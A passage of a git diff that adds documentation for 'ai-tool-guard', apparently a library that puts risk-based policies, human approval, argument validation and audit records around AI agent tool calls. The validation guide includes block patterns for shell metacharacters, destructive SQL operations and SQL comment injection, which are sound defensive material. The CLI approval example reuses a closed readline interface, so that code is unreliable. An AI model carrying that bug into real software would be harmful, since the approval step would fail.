Require human approval | +| `high` | Deny | +| `critical` | Deny | + +You can replace or extend `defaultPolicy()` with your own rules. See [Policy Engine](../guides/policy-engine.md) for details. + +**`onApprovalRequired`** + +An async callback invoked when a tool call requires approval before execution. The callback receives an approval token containing the tool name and original arguments. It must return an object with `{ approved: boolean, approvedBy: string }`. Return `{ approved: false }` to deny the call at runtime. + +This callback is your integration point for external approval systems — a Slack notification, an internal dashboard, or any other human-in-the-loop mechanism. + +**`onDecision`** + +A synchronous callback invoked after every policy evaluation. The decision record includes the tool name, the verdict (`allow`, `deny`, or `approve`), the reason string from the matching rule, and the sanitized arguments. Use this for audit logging, metrics, or debugging. + +### Step 3 — Wrap tools with risk levels + +`guard.guardTools()` accepts a map of named tool entries. Each entry pairs a tool definition with a `riskLevel` string that is used during policy evaluation. + +```ts +const tools = guard.guardTools({ + getWeather: { tool: getWeather, riskLevel: "low" }, + deleteUser: { tool: deleteUser, riskLevel: "high" }, +}); +``` + +The object returned by `guardTools()` is a plain `Record` that is fully compatible with the `tools` parameter of `generateText()`, `streamText()`, and other Vercel AI SDK functions. No adapter or conversion step is required. + +### Step 4 — Use with the AI SDK as normal + +Pass the wrapped tools to any Vercel AI SDK call. The guard middleware runs transparently inside each tool's `execute` function. From the SDK's perspective, the tools look identical to unguarded ones. + +```ts +const result = await generateText({ + model: openai("gpt-4o"), + tools, + prompt: "What's the weather in Tokyo?", +}); +``` + +## What just happened? + +When the model invoked `getWeather` with `{ city: "Tokyo" }`, the following pipeline ran inside the guarded execute function: + +**Injection detection** +The raw arguments were scanned for prompt injection patterns before any policy rule was evaluated. Arguments that trigger injection heuristics are rejected before they reach your `execute` implementation. + +**Policy evaluation** +The rule list was evaluated in order. The first rule matching the tool name and risk level determined the verdict. + +**Verdict for `getWeather` (low risk)** +`defaultPolicy()` maps `low` to `allow`, so the call was permitted immediately and forwarded to your `execute` function without interruption. + +**Verdict for `deleteUser` (high risk)** +Had the model attempted to call `deleteUser`, `defaultPolicy()` would have mapped `high` to `deny`. The call would have been blocked and a denial reason returned to the model rather than executing the deletion. + +**Decision record emitted** +`onDecision` was called with the verdict, tool name, reason string, and sanitized arguments. This fires for every tool call regardless of outcome, giving you a complete audit trail. + +**OpenTelemetry spans** +If `@opentelemetry/api` is present in your project, `ai-tool-guard` automatically emits spans for each policy evaluation. No additional configuration is required. + +## Next steps + +- [Core Concepts](concepts.md) — understand the mental model behind guards, rules, and verdicts +- [Policy Engine](../guides/policy-engine.md) — write custom rules tailored to your application +- [Argument Validation](../guides/argument-validation.md) — validate and sanitize tool inputs before execution +- [Approval Workflows](../guides/approval-workflows.md) — implement human-in-the-loop approval for sensitive operations diff --git a/docs/guides/approval-workflows.md b/docs/guides/approval-workflows.md new file mode 100644 index 0000000..230e7c4 --- /dev/null +++ b/docs/guides/approval-workflows.md @@ -0,0 +1,248 @@ +# Approval Workflows + +When the policy engine returns `"require-approval"` for a tool call, `ai-tool-guard` pauses execution and invokes your `ApprovalHandler`. The handler receives a signed token describing the pending call and must return a resolution — approved, denied, or approved with modified arguments. + +## Overview + +The approval flow involves three types: + +| Type | Role | +|---|---| +| `ApprovalToken` | Describes the pending tool call. Created by `ApprovalManager` and passed to your handler. | +| `ApprovalResolution` | Your handler's response: approve, deny, or approve with patched arguments. | +| `ApprovalHandler` | Your callback function: `(token: ApprovalToken) => Promise`. | + +The `ApprovalManager` class manages the full lifecycle: creating tokens, tracking pending requests, enforcing TTL expiry, and merging patched arguments into the final call. + +## Basic Usage + +Register an `ApprovalHandler` via `onApprovalRequired` in your guard configuration: + +```ts +import { createToolGuard, defaultPolicy } from "ai-tool-guard"; + +const guard = createToolGuard({ + rules: defaultPolicy(), + onApprovalRequired: async (token) => { + console.log(`Approval requested for "${token.toolName}"`); + console.log("Arguments:", token.originalArgs); + console.log("Token ID:", token.id); + console.log("Payload hash:", token.payloadHash); + + // Simple synchronous approval for illustration. + return { + approved: true, + approvedBy: "admin@example.com", + }; + }, +}); +``` + +To deny a call from the handler, return `{ approved: false }` with an optional `reason`: + +```ts +onApprovalRequired: async (token) => { + return { + approved: false, + reason: "Request rejected by the on-call operator.", + }; +}, +``` + +## Configuration Options + +### `ApprovalToken` + +The token is created by `ApprovalManager` and passed read-only to your handler. + +| Field | Type | Description | +|---|---|---| +| `id` | `string` | Random unique identifier for this approval request. | +| `payloadHash` | `string` | SHA-256 hash of `{ toolName, args }` (canonicalised). Used for correlation and tamper detection. | +| `toolName` | `string` | Name of the tool awaiting approval. | +| `originalArgs` | `Record` | Deep clone of the arguments the model supplied. | +| `createdAt` | `string` | ISO-8601 timestamp of token creation. | +| `ttlMs` | `number \| undefined` | Token expiry window in milliseconds. Default is 5 minutes (300 000 ms). | + +### `ApprovalResolution` + +Return this object from your handler. + +| Field | Type | Required | Description | +|---|---|---|---| +| `approved` | `boolean` | Yes | Whether the call is approved. | +| `patchedArgs` | `Record` | No | Partial argument overrides. Merged with `originalArgs`; keys in `patchedArgs` take precedence. | +| `approvedBy` | `string` | No | Identity of the approver, written to the decision record for audit. | +| `reason` | `string` | No | Human-readable reason, used when `approved` is `false`. | + +### `ApprovalManager` + +`ApprovalManager` is the class that orchestrates the flow internally. You do not instantiate it directly — the guard creates one from your `onApprovalRequired` callback. Its public surface is useful when building approval UIs: + +```ts +class ApprovalManager { + constructor(handler: ApprovalHandler, defaultTtlMs?: number); + + /** Create a token and invoke the handler. Returns the final flow result. */ + requestApproval(ctx: PolicyContext): Promise; + + /** Read-only snapshot of pending tokens (useful for dashboards). */ + getPendingTokens(): ReadonlyArray; +} +``` + +## Advanced Examples + +### Slack-Based Approval + +Route approval requests through a Slack message. The handler sends a message, then polls for a response via a shared in-memory map updated by a Slack webhook endpoint: + +```ts +import type { ApprovalHandler, ApprovalResolution } from "ai-tool-guard"; + +// Map populated by your /slack/actions webhook handler. +const pendingSlackResponses = new Map(); + +const slackApprovalHandler: ApprovalHandler = async (token) => { + // Post a message to the approvals channel. + await postSlackMessage({ + channel: "#tool-approvals", + text: `Tool call requires approval`, + blocks: [ + { + type: "section", + text: { + type: "mrkdwn", + text: `*Tool:* \`${token.toolName}\`\n*Args:* \`\`\`${JSON.stringify(token.originalArgs, null, 2)}\`\`\``, + }, + }, + { + type: "actions", + elements: [ + { type: "button", text: { type: "plain_text", text: "Approve" }, value: token.id, action_id: "approve_tool" }, + { type: "button", text: { type: "plain_text", text: "Deny" }, value: token.id, action_id: "deny_tool", style: "danger" }, + ], + }, + ], + }); + + // Poll for a response until TTL elapses. + const deadline = Date.now() + (token.ttlMs ?? 300_000); + while (Date.now() < deadline) { + const resolution = pendingSlackResponses.get(token.id); + if (resolution) { + pendingSlackResponses.delete(token.id); + return resolution; + } + await new Promise((resolve) => setTimeout(resolve, 2_000)); + } + + return { approved: false, reason: "Approval request timed out." }; +}; + +// In your Slack webhook route: +// app.post("/slack/actions", (req, res) => { +// const payload = JSON.parse(req.body.payload); +// const action = payload.actions[0]; +// pendingSlackResponses.set(action.value, { +// approved: action.action_id === "approve_tool", +// approvedBy: payload.user.name, +// }); +// res.send(); +// }); +``` + +### Approve with Edits (patchedArgs) + +An approver can modify the arguments before the tool executes. Patched fields are merged shallowly with the original arguments and recorded in `ApprovalFlowResult.patchedFields`: + +```ts +import type { ApprovalHandler } from "ai-tool-guard"; + +const editingApprovalHandler: ApprovalHandler = async (token) => { + // Suppose the model tried to delete all records; an operator limits the scope. + if (token.toolName === "db.deleteRecords") { + const originalQuery = token.originalArgs["query"] as string; + + if (originalQuery === "*") { + // Approve, but rewrite the wildcard to a safe test scope. + return { + approved: true, + approvedBy: "dba@example.com", + patchedArgs: { + query: "status = 'test'", + limit: 100, + }, + }; + } + } + + return { approved: true, approvedBy: "auto-approver" }; +}; +``` + +After the handler returns, `ApprovalManager` merges `patchedArgs` over `originalArgs`: + +```ts +const finalArgs = { ...token.originalArgs, ...resolution.patchedArgs }; +``` + +The merged `finalArgs` are used for the actual tool execution. The original arguments are never mutated. + +### CLI Prompt Approval + +For command-line tools and scripts, prompt the operator interactively using Node's `readline` module: + +```ts +import * as readline from "node:readline/promises"; +import { stdin as input, stdout as output } from "node:process"; +import type { ApprovalHandler } from "ai-tool-guard"; + +const cliApprovalHandler: ApprovalHandler = async (token) => { + const rl = readline.createInterface({ input, output }); + + console.log(`\n--- Approval Required ---`); + console.log(`Tool: ${token.toolName}`); + console.log(`Arguments: ${JSON.stringify(token.originalArgs, null, 2)}`); + console.log(`Token ID: ${token.id}`); + console.log(`Hash: ${token.payloadHash}`); + + const answer = await rl.question("\nApprove? [y/N] "); + rl.close(); + + if (answer.trim().toLowerCase() === "y") { + const approver = await rl.question("Your name: "); + rl.close(); + return { approved: true, approvedBy: approver.trim() }; + } + + return { approved: false, reason: "Denied at CLI prompt." }; +}; +``` + +## How It Works + +The internal flow, implemented in `src/approval/manager.ts`, runs as follows: + +1. **Token creation** — `requestApproval(ctx)` computes a SHA-256 hash of the canonicalised `{ toolName, args }` payload. This `payloadHash` ties the token to the exact tool call; any tampering with the arguments after token creation is detectable via hash mismatch. + +2. **Token registration** — The token is stored in an in-memory `Map` keyed by `token.id`. `getPendingTokens()` exposes a read-only snapshot of this map for UI display. + +3. **Handler invocation** — Your `ApprovalHandler` is called with the token. The manager awaits the returned `Promise`. + +4. **TTL check** — When the resolution arrives, the manager checks whether `Date.now() - createdAt > ttlMs`. Expired tokens return an error result with `approved: false` regardless of what the handler returned. + +5. **Argument patching** — If `resolution.patchedArgs` is non-empty, it is shallow-merged over `token.originalArgs`. The merged result becomes the `args` field of `ApprovalFlowResult`. + +6. **Token cleanup** — The token is removed from the pending map in the `finally` block of `requestApproval`, ensuring cleanup even if the handler throws. + +!!! info "Payload hash correlation" + The `payloadHash` (SHA-256 of the canonical `{ toolName, args }` JSON) lets downstream systems — approval UIs, audit logs, Slack bots — verify that the call they are approving matches exactly what the policy engine originally evaluated. Store and display it alongside approval records. + +!!! warning "TTL is enforced server-side" + The 5-minute default TTL is enforced by the manager when the resolution arrives, not when the token is created. A handler that blocks for longer than the TTL will have its resolution rejected. Set a custom TTL via the `defaultTtlMs` constructor parameter when instantiating `ApprovalManager` directly, or accept the 300 000 ms default. + +## Related + +- [API Reference](../api/approval.md) — full type documentation for `ApprovalToken`, `ApprovalResolution`, `ApprovalHandler`, and `ApprovalFlowResult`. +- [Error Handling](error-handling.md) — how denied and errored approvals are surfaced to the caller. diff --git a/docs/guides/argument-validation.md b/docs/guides/argument-validation.md new file mode 100644 index 0000000..c83c9c8 --- /dev/null +++ b/docs/guides/argument-validation.md @@ -0,0 +1,324 @@ +# Argument Validation + +Argument guards intercept tool calls before policy evaluation and inspect the raw arguments the model supplies. They let you enforce schemas, restrict values to known-safe sets, block forbidden values, scan for PII, and apply any custom logic — all without modifying your tool implementations. + +## Overview + +Every argument guard is evaluated by `evaluateArgGuards` before the policy engine runs. If any guard returns a violation, the tool call is blocked and a structured list of violations is returned to the caller. Guards are composable: attach as many as needed to a single tool. + +Guards target individual fields via dot-path strings (`"query"`, `"config.region"`) or the entire args object via the wildcard `"*"`. + +## Basic Usage + +Attach guards to a tool using the `argGuards` array on `ToolGuardConfig`: + +```typescript +import { createToolGuard } from "ai-tool-guard"; +import { allowlist, denylist, piiGuard, zodGuard } from "ai-tool-guard/guards"; +import { z } from "zod"; + +const guard = createToolGuard({ + rules: [{ id: "allow-all", toolPatterns: ["*"], verdict: "allow" }], +}); + +const wrappedQuery = guard.guardTool("myDbQuery", myDbQueryTool, { + riskLevel: "high", + argGuards: [ + zodGuard({ field: "limit", schema: z.number().int().min(1).max(1000) }), + allowlist("database", ["analytics", "reporting"]), + piiGuard("query"), + ], +}); +``` + +When a guard blocks a call, the engine emits a `ToolGuardError` with `code: "arg-guard-failed"` and includes the full violations list. The corresponding `DecisionRecord` carries the same detail. + +## Configuration Options + +### `zodGuard({ field, schema })` + +Validates a single field against any Zod schema. The `schema` can be any `z.ZodType`, including objects, unions, and refinements. When validation fails, the error message includes all Zod issue messages joined with semicolons. + +```typescript +import { zodGuard } from "ai-tool-guard/guards"; +import { z } from "zod"; + +// Reject calls where `limit` is not a positive integer under 1000. +zodGuard({ + field: "limit", + schema: z.number().int().positive().max(1000), +}); + +// Validate a nested object field. +zodGuard({ + field: "options", + schema: z.object({ + format: z.enum(["json", "csv"]), + compress: z.boolean().optional(), + }), +}); +``` + +### `allowlist(field, allowed)` + +Blocks calls where the field value is not present in the provided array. Uses strict equality (`===`). + +```typescript +import { allowlist } from "ai-tool-guard/guards"; + +// Only allow writes to known environments. +allowlist("environment", ["staging", "canary"]); + +// Restrict database selection using a dot-path. +allowlist("config.database", ["analytics", "reporting", "logs"]); +``` + +### `denylist(field, denied)` + +Blocks calls where the field value appears in the denied array. The logical inverse of `allowlist`. + +```typescript +import { denylist } from "ai-tool-guard/guards"; + +// Prevent reads from sensitive tables. +denylist("table", ["users_pii", "payment_methods", "audit_log"]); + +// Block dangerous SQL operation types. +denylist("operation", ["DROP", "TRUNCATE", "ALTER"]); +``` + +### `regexGuard(field, pattern, opts?)` + +Validates that a string field matches (or does not match) a regular expression. + +| Option | Type | Default | Description | +|---|---|---|---| +| `mustMatch` | `boolean` | `true` | When `true`, the value must match the pattern. When `false`, a match is a violation. | +| `message` | `string` | built-in | Custom violation message returned to the caller. | + +```typescript +import { regexGuard } from "ai-tool-guard/guards"; + +// Value must look like a valid S3 bucket name. +regexGuard("bucket", /^[a-z0-9][a-z0-9\-]{1,61}[a-z0-9]$/, { + mustMatch: true, + message: 'Invalid S3 bucket name in "bucket".', +}); + +// Value must NOT contain shell metacharacters. +regexGuard("filename", /[;&|`$<>]/, { + mustMatch: false, + message: "Shell metacharacters are not allowed in filenames.", +}); +``` + +`regexGuard` returns a type error if the field value is not a string. + +### `piiGuard(field, opts?)` + +Scans a string value for common PII patterns. Blocks the call if any pattern is detected, unless the type is listed in `allowedTypes`. + +Detected PII types: + +| Type | Description | +|---|---| +| `email` | Standard email address format | +| `ssn` | US Social Security Number (`NNN-NN-NNNN`) | +| `credit-card` | Visa, Mastercard, Amex, Discover — with Luhn checksum validation | +| `phone-us` | North American Numbering Plan phone numbers | +| `ip-address` | IPv4 addresses | + +```typescript +import { piiGuard } from "ai-tool-guard/guards"; + +// Reject any PII in a free-text query field. +piiGuard("query"); + +// Allow email addresses but block all other PII types. +piiGuard("recipient", { allowedTypes: ["email"] }); +``` + +Credit card numbers are validated against the Luhn algorithm before a violation is raised. This eliminates false positives from numeric strings that happen to match the card number format but are not valid card numbers. + +### Dot-path Field Access + +The `field` string uses dot notation to address nested argument properties: + +```typescript +// Accesses args.config.region +allowlist("config.region", ["us-east-1", "eu-west-1"]); + +// Accesses args.user.email +piiGuard("user.email", { allowedTypes: ["email"] }); +``` + +Traversal stops safely if any intermediate property is `null` or not an object. In that case the guard receives `undefined`. Most built-in guards treat `undefined` as a pass for optional fields; `zodGuard` applies the Zod schema and may reject it depending on whether the schema marks the field as required. + +### Wildcard Field `"*"` + +Setting `field: "*"` passes the entire `args` object — rather than a single field — to the `validate` function. Use this for cross-field rules or full-args inspection: + +```typescript +import type { ArgGuard } from "ai-tool-guard"; + +const noEmptyArgs: ArgGuard = { + field: "*", + validate(args) { + if (!args || Object.keys(args as object).length === 0) { + return "Tool called with no arguments."; + } + return null; + }, +}; +``` + +### Custom `ArgGuard` Interface + +Implement `ArgGuard` directly for any logic not covered by the built-ins: + +```typescript +import type { ArgGuard, PolicyContext } from "ai-tool-guard"; + +const domainAllowlistGuard: ArgGuard = { + field: "url", + async validate(value: unknown, ctx: PolicyContext): Promise { + if (typeof value !== "string") return null; + const url = new URL(value); + const allowed = (ctx.userAttributes.allowedDomains as string[]) ?? []; + if (!allowed.includes(url.hostname)) { + return `Domain "${url.hostname}" is not in your approved list.`; + } + return null; + }, +}; +``` + +The `validate` function signature is: + +```typescript +validate(value: unknown, ctx: PolicyContext): string | null | Promise +``` + +Return a non-null string to block the call with that message. Return `null` to pass. + +### `evaluateArgGuards(guards, ctx)` + +The runner function that executes all guards and collects results: + +```typescript +import { evaluateArgGuards } from "ai-tool-guard/guards"; + +const result = await evaluateArgGuards(guards, ctx); +// result.passed — true if no violations +// result.violations — Array<{ field: string; message: string }> +``` + +Guards are always run to completion — all guards are evaluated even after a violation is found, so a single call can surface multiple violations at once. + +## Advanced Examples + +### Securing a Database Query Tool + +Layer multiple guards to enforce types, restrict targets, and prevent PII leakage in query text: + +```typescript +import { createToolGuard } from "ai-tool-guard"; +import { + allowlist, + denylist, + piiGuard, + regexGuard, + zodGuard, +} from "ai-tool-guard/guards"; +import { z } from "zod"; + +const guard = createToolGuard(); + +const wrappedDbQuery = guard.guardTool("dbQuery", dbQueryTool, { + riskLevel: "high", + riskCategories: ["data-read"], + argGuards: [ + // Only allow queries against known read replicas. + allowlist("database", ["analytics_ro", "reporting_ro"]), + + // Restrict result size to prevent unbounded reads. + zodGuard({ + field: "limit", + schema: z.number().int().min(1).max(500), + }), + + // Block queries that reference internal schema tables. + denylist("table", ["pg_catalog", "information_schema"]), + + // Ensure query strings don't accidentally carry PII + // (e.g., a user email embedded in a search filter). + piiGuard("query"), + + // Prevent SQL comment injection. + regexGuard("query", /--/, { + mustMatch: false, + message: "SQL comments are not permitted in query arguments.", + }), + ], +}); +``` + +### Context-Aware Guard Using User Attributes + +Guards receive the full `PolicyContext`, including `userAttributes`. Use this to apply per-tenant restrictions: + +```typescript +import type { ArgGuard } from "ai-tool-guard"; + +const tenantScopedRegionGuard: ArgGuard = { + field: "region", + validate(value, ctx) { + const allowed = ctx.userAttributes.allowedRegions as string[] | undefined; + if (!allowed) return null; // No restriction configured for this tenant. + if (!allowed.includes(value as string)) { + return `Region "${value}" is not permitted for your account.`; + } + return null; + }, +}; +``` + +### Cross-Field Validation with the Wildcard Guard + +Use `field: "*"` when a rule requires inspecting multiple arguments together: + +```typescript +import type { ArgGuard } from "ai-tool-guard"; + +const exportSizeGuard: ArgGuard = { + field: "*", + validate(args) { + const a = args as { limit?: number; includeAttachments?: boolean }; + if (a.includeAttachments && (a.limit ?? 0) > 100) { + return ( + "Cannot export more than 100 records when includeAttachments is true." + ); + } + return null; + }, +}; +``` + +## How It Works + +1. `evaluateArgGuards` iterates over the guards array in declaration order. +2. For each guard, the field value is extracted from `ctx.args` using dot-path traversal, or the entire `args` object is passed for `"*"`. +3. `guard.validate(value, ctx)` is called and awaited. +4. Any non-null return value is recorded as a `{ field, message }` violation. +5. After all guards run, the result is `{ passed: boolean, violations: Array<{ field: string; message: string }> }`. +6. If `passed` is `false`, the engine blocks the call, emits a denied `DecisionRecord`, and throws `ToolGuardError`. + +!!! note "Guards do not short-circuit" + All guards always run to completion. This means a single blocked call can report violations from multiple guards simultaneously, which is useful for surfacing all problems to the caller in one round trip. + +## Related + +- [API Reference — Guards](../api/guards.md) +- [Injection Detection](injection-detection.md) +- [Output Filtering](output-filtering.md) +- [Decision Records](decision-records.md) diff --git a/docs/guides/conversation-aware-policies.md b/docs/guides/conversation-aware-policies.md new file mode 100644 index 0000000..5ff4869 --- /dev/null +++ b/docs/guides/conversation-aware-policies.md @@ -0,0 +1,278 @@ +# Conversation-Aware Policies + +## Overview + +Standard policy rules evaluate each tool call in isolation using the tool name, arguments, and static user attributes. Conversation-aware policies extend this by making session-level state available to rule conditions — things like how many tool failures have occurred in the current conversation, what risk score has accumulated, or which tools have already been approved by a human operator in this session. + +This enables dynamic policy behavior: restrictions that escalate after repeated failures, tools that become available only after an initial approval, or risk scoring that tightens access as a session accumulates suspicious patterns. + +--- + +## Basic Usage + +Provide a `resolveConversationContext` callback in `createToolGuard`. It is called before every policy evaluation and may return a plain object or a `Promise`: + +```typescript +import { createToolGuard } from 'ai-tool-guard'; +import type { ConversationContext } from 'ai-tool-guard'; + +const guard = createToolGuard({ + rules: [...], + resolveConversationContext: async (): Promise => { + // Fetch session state from your session store or in-memory map. + const session = await sessionStore.get(currentSessionId); + return { + sessionId: session.id, + riskScore: session.riskScore, + priorFailures: session.failureCount, + recentApprovals: session.approvedTools, + }; + }, +}); +``` + +The returned `ConversationContext` is attached to `PolicyContext.conversation` and is accessible inside any rule `condition` function. + +--- + +## `ConversationContext` Fields + +```typescript +interface ConversationContext { + /** Unique conversation or session identifier. */ + sessionId?: string; + /** Accumulated risk score for the session. Range is application-defined. */ + riskScore?: number; + /** Number of tool failures (errors, denials) in the current conversation. */ + priorFailures?: number; + /** Tool names that a human has explicitly approved earlier in this session. */ + recentApprovals?: string[]; + /** Arbitrary application-specific key-value state. */ + metadata?: Record; +} +``` + +| Field | Type | Description | +|---|---|---| +| `sessionId` | `string` | Identifies the conversation for logging and correlation. | +| `riskScore` | `number` | A numeric score you maintain and update as the session progresses. Interpretation is entirely application-defined. | +| `priorFailures` | `number` | Count of failed or denied tool calls in the session. Useful for progressive lockdown. | +| `recentApprovals` | `string[]` | Tool names approved by a human operator. Lets you relax subsequent checks for already-reviewed tools. | +| `metadata` | `Record` | Escape hatch for any session state that does not fit the other fields. | + +--- + +## Accessing Conversation Context in Rules + +Inside a rule's `condition` function, conversation state is available via `ctx.conversation`: + +```typescript +import type { PolicyRule } from 'ai-tool-guard'; + +const rule: PolicyRule = { + id: 'escalate-on-failures', + description: 'Deny all high-risk tools if 3+ failures have occurred.', + toolPatterns: ['*'], + riskLevels: ['high', 'critical'], + verdict: 'deny', + condition: (ctx) => { + const failures = ctx.conversation?.priorFailures ?? 0; + return failures >= 3; + }, +}; +``` + +`ctx.conversation` is `undefined` when no `resolveConversationContext` callback is configured, so defensive access with `?.` and a fallback default is recommended. + +The full `PolicyContext` shape: + +```typescript +interface PolicyContext { + toolName: string; + args: Record; + userAttributes: Record; + conversation?: ConversationContext; // Available when callback is set. + dryRun?: boolean; +} +``` + +--- + +## Use Cases + +### Escalating Restrictions After Failures + +Lock down high-risk tools automatically when a session accumulates too many failures, reducing the blast radius of a compromised or confused agent: + +```typescript +const guard = createToolGuard({ + rules: [ + { + id: 'progressive-lockdown', + toolPatterns: ['*'], + riskLevels: ['high', 'critical'], + verdict: 'deny', + priority: 10, + condition: (ctx) => (ctx.conversation?.priorFailures ?? 0) >= 3, + }, + ], + resolveConversationContext: () => sessionState.get(currentSessionId), +}); +``` + +### Session-Based Risk Scoring + +Compute a risk score from the agent's recent behavior and use it to gate access to sensitive tools: + +```typescript +const guard = createToolGuard({ + rules: [ + { + id: 'high-risk-score-block', + toolPatterns: ['*'], + riskLevels: ['medium', 'high', 'critical'], + verdict: 'require-approval', + condition: (ctx) => (ctx.conversation?.riskScore ?? 0) > 0.7, + }, + ], + resolveConversationContext: async () => { + const score = await riskScorer.getScore(currentSessionId); + return { riskScore: score }; + }, +}); +``` + +### Unlocking Tools After Human Approval + +Once a human approves a sensitive tool call in a session, allow subsequent calls to that tool without re-prompting: + +```typescript +const guard = createToolGuard({ + rules: [ + { + id: 'require-first-approval', + toolPatterns: ['sendEmail', 'postToSlack'], + verdict: 'require-approval', + condition: (ctx) => { + const approved = ctx.conversation?.recentApprovals ?? []; + // Skip approval if this tool was already approved this session. + return !approved.includes(ctx.toolName); + }, + }, + ], + resolveConversationContext: () => ({ + recentApprovals: approvedToolsCache.get(currentSessionId) ?? [], + }), + onApprovalRequired: async (token) => { + const resolution = await showApprovalModal(token); + if (resolution.approved) { + // Record the approval so future calls skip the modal. + approvedToolsCache.add(currentSessionId, token.toolName); + } + return resolution; + }, +}); +``` + +--- + +## Advanced Examples + +### Progressive Lockdown with Auto-Recovery + +Escalate restrictions as failures accumulate, but reset after a cool-down period using `metadata`: + +```typescript +import { createToolGuard } from 'ai-tool-guard'; + +const guard = createToolGuard({ + rules: [ + { + id: 'lockdown-after-failures', + toolPatterns: ['*'], + riskLevels: ['high', 'critical'], + verdict: 'deny', + priority: 20, + condition: (ctx) => { + const failures = ctx.conversation?.priorFailures ?? 0; + const lockedUntil = ctx.conversation?.metadata?.lockedUntil as number | undefined; + if (lockedUntil && Date.now() < lockedUntil) { + return true; // Still in lockdown period. + } + return failures >= 5; + }, + }, + ], + resolveConversationContext: async () => { + const session = await sessionStore.get(currentSessionId); + return { + priorFailures: session.failures, + metadata: { + lockedUntil: session.lockedUntil, + }, + }; + }, + onDecision: async (record) => { + if (record.verdict === 'deny') { + await sessionStore.incrementFailures(currentSessionId); + if ((await sessionStore.getFailures(currentSessionId)) >= 5) { + // Lock the session for 15 minutes. + await sessionStore.setLockedUntil( + currentSessionId, + Date.now() + 15 * 60 * 1000, + ); + } + } + }, +}); +``` + +### Trusted Session Relaxation + +Allow additional capabilities once a session has demonstrated trustworthy behavior through a series of approved low-risk calls: + +```typescript +const guard = createToolGuard({ + rules: [ + { + id: 'trusted-session-expanded-access', + toolPatterns: ['exportReport', 'bulkUpdate'], + verdict: 'allow', + priority: 15, // Higher priority than the default deny rules below. + condition: (ctx) => { + const approvals = ctx.conversation?.recentApprovals ?? []; + // Require that at least 3 different tools have been reviewed this session. + return approvals.length >= 3; + }, + }, + { + id: 'default-deny-bulk-ops', + toolPatterns: ['exportReport', 'bulkUpdate'], + verdict: 'require-approval', + }, + ], + resolveConversationContext: () => ({ + recentApprovals: sessionApprovals.get(currentSessionId) ?? [], + }), +}); +``` + +--- + +## How It Works + +1. Before each tool invocation, `ToolGuard` calls `resolveConversationContext()` if configured and awaits the result. +2. The returned `ConversationContext` is merged into the `PolicyContext` as the `conversation` field. +3. The full `PolicyContext` — including `conversation` — is passed to every policy rule's `condition` function. +4. Rules can read any field from `ctx.conversation` to make contextual decisions. The context is read-only from within a rule; mutations to the returned object do not affect the session store. +5. After the evaluation, `resolveConversationContext` is called again on the next invocation — the callback is responsible for reading fresh state each time. + +!!! tip + Keep `resolveConversationContext` fast. It runs synchronously in the guard's execution pipeline before the policy engine. Use in-memory caches or lightweight lookups rather than database queries where possible. + +--- + +## Related + +- [Policy Engine](policy-engine.md) +- [API Reference — Types](../api/types.md) diff --git a/docs/guides/decision-records.md b/docs/guides/decision-records.md new file mode 100644 index 0000000..bf6e405 --- /dev/null +++ b/docs/guides/decision-records.md @@ -0,0 +1,308 @@ +# Decision Records + +## Overview + +Every tool call evaluation — whether it results in `allow`, `deny`, or `require-approval` — produces a `DecisionRecord`. This record is the primary observability artifact of ai-tool-guard. It captures the full context of the decision: which rules matched, what risk classifications applied, how long evaluation took, whether output was redacted, and a human-readable reason for the verdict. + +Decision records are delivered via the `onDecision` callback in `GuardOptions`. They are also attached to `ToolGuardError` instances for policy-originated errors, and they map directly to OTel span attributes for trace-level visibility. + +--- + +## The `DecisionRecord` Interface + +```typescript +interface DecisionRecord { + /** UUIDv4 identifier for this decision. Use for correlation across logs, spans, and alerts. */ + id: string; + /** ISO-8601 timestamp of when the decision was made. */ + timestamp: string; + /** The policy verdict: "allow", "deny", or "require-approval". */ + verdict: DecisionVerdict; + /** Name of the tool that was evaluated. */ + toolName: string; + /** IDs of all policy rules that matched and influenced the verdict. */ + matchedRules: string[]; + /** Risk level assigned to the tool at evaluation time. */ + riskLevel: RiskLevel; + /** Risk categories that applied to this tool call. */ + riskCategories: RiskCategory[]; + /** Caller-supplied attributes available to the policy engine (user roles, tenant, etc.). */ + attributes: Record; + /** Human-readable explanation of the verdict. */ + reason: string; + /** Field names redacted by output filters, if any. Present only when redaction occurred. */ + redactions?: string[]; + /** Wall-clock time spent in policy evaluation, in milliseconds. */ + evalDurationMs: number; + /** Whether this was a dry-run evaluation (no tool was actually executed). */ + dryRun: boolean; +} +``` + +All 12 fields: + +| Field | Type | Always Present | Description | +|---|---|---|---| +| `id` | `string` | Yes | UUIDv4 for correlation across systems. | +| `timestamp` | `string` | Yes | ISO-8601 datetime of the evaluation. | +| `verdict` | `"allow" \| "deny" \| "require-approval"` | Yes | The outcome of policy evaluation. | +| `toolName` | `string` | Yes | The tool that was evaluated. | +| `matchedRules` | `string[]` | Yes | IDs of rules that matched. Empty array means no rules matched (default verdict applied). | +| `riskLevel` | `"low" \| "medium" \| "high" \| "critical"` | Yes | Effective risk level used in evaluation. | +| `riskCategories` | `RiskCategory[]` | Yes | Classification tags for the tool call. | +| `attributes` | `Record` | Yes | User-supplied context attributes available during evaluation. | +| `reason` | `string` | Yes | Human-readable verdict explanation. | +| `redactions` | `string[]` | No | Field names removed by output filters. Only present when redaction occurred. | +| `evalDurationMs` | `number` | Yes | Time spent in policy evaluation. Excludes tool execution time. | +| `dryRun` | `boolean` | Yes | `true` when the guard is in simulation or dry-run mode. | + +--- + +## The `onDecision` Callback + +Register a callback to receive every `DecisionRecord` as it is produced: + +```typescript +import { createToolGuard } from 'ai-tool-guard'; + +const guard = createToolGuard({ + rules: [...], + onDecision: async (record) => { + // Called for every evaluation: allow, deny, and require-approval. + console.log(`[${record.verdict}] ${record.toolName} — ${record.reason}`); + }, +}); +``` + +The callback signature is: + +```typescript +onDecision?: (record: DecisionRecord) => void | Promise; +``` + +The callback is `await`ed before the guard pipeline continues, so errors thrown inside it propagate to the caller. If you want non-blocking side effects (e.g., fire-and-forget logging), resolve the promise yourself: + +```typescript +onDecision: (record) => { + // Do not await — fire and forget. + writeToAuditLog(record).catch(console.error); +}, +``` + +!!! warning + `onDecision` is called on every verdict including `allow`. If your callback performs I/O, ensure it is fast or non-blocking. Slow callbacks will add latency to every tool call, including allowed ones. + +--- + +## Use Cases + +### Audit Logging + +Write every decision to a structured log file for compliance and post-hoc analysis: + +```typescript +import { createToolGuard } from 'ai-tool-guard'; +import fs from 'node:fs'; + +const auditStream = fs.createWriteStream('audit.jsonl', { flags: 'a' }); + +const guard = createToolGuard({ + rules: [...], + onDecision: (record) => { + auditStream.write(JSON.stringify(record) + '\n'); + }, +}); +``` + +Each line in the output is a complete, self-contained JSON object. The `id` field enables joining these records with 